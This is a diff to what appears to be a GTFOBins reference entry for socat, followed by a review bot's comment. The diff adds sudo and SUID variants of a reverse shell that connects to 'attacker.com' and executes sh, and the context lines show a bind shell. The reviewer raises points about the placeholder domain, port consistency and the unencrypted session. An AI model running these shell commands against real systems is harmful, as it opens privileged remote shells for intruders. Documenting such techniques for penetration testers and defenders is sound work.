diff --git a/_gtfobins/socat.md b/_gtfobins/socat.md
index 9ea1c3e..1923073 100644
--- a/_gtfobins/socat.md
+++ b/_gtfobins/socat.md
@@ -11,4 +11,16 @@ functions:
 code: |
 LPORT=12345
 socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:sh,pty,stderr,setsid,sigint,sane
+ sudo-enabled:
+ - description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
+ code: |
+ RHOST=attacker.com
+ RPORT=12345
+ sudo -E socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
+ suid-limited:
+ - description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
+ code: |
+ RHOST=attacker.com
+ RPORT=12345
+ ./socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
 ---
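Review bot: Both added entries set `RHOST=attacker.com`, which is a registrable real domain rather than a reserved placeholder, so a snippet pasted unchanged during a test would open an outbound session to a host the tester does not control; a reserved name such as `RHOST=attacker.example` avoids that, unless `attacker.com` is a project-wide convention not visible in this hunk. The two descriptions also hard-code `tcp-listen:12345` while the code parameterises `RPORT`, so the text and the variable can drift apart; the description could say that the listener port must match `RPORT`. It would also help to state in the description that the session is plain TCP, so everything typed in it crosses the network unencrypted.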